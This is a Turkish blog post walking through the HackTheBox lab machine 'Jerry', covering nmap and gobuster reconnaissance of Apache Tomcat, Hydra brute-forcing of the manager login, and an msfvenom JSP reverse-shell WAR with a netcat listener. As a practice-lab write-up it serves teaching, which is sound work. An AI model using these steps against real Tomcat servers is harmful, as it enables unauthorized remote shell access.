Post

Jerry

Posted
Preview Image
By Umut Sağlam 1 min read

Jerry, Apache Tomcat’in sıklıkla zayıf kimlik bilgileriyle yapılandırılması nedeniyle gerçekçidir.

Jerry

User Flag

nmap çalıştıralım.

1
2
3
4
5
6
7
8
9
10
11

┌──(root㉿kali)-[~]
└─# nmap -T4 -sV 10.10.10.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 06:58 EDT
Nmap scan report for 10.10.10.95 (10.10.10.95)
Host is up (0.074s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.20 seconds

8080 portu açık ve apache tomcat çalışıyor.

Gobuster toolu ile dizin arıyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

┌──(root㉿kali)-[~]
└─# gobuster dir --wordlist=/usr/share/wordlists/dirb/common.txt --url http://10.10.10.95:8080  -t40 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.95:8080
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 302) [Size: 0] [--> /backup/]
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
/shell                (Status: 302) [Size: 0] [--> /shell/]
/test                 (Status: 302) [Size: 0] [--> /test/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

/manager dizinine gittiğimizde username ve password soruyor.

Hydra ile brute force deniyorum.

  • tomcat:s3cret

/manager/html dizinine .war dosyası yükleyerek reverse shell alabiliriz.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.4 LPORT=1234 -f war > shell.war

nc -nvlp 1234

Makineye girmeyi başardık.

Bu sefer User ve Root flagı aynı dosya içerisinde.

fsoc

HackTheBox
Windows
This post is licensed under CC BY 4.0 by the author.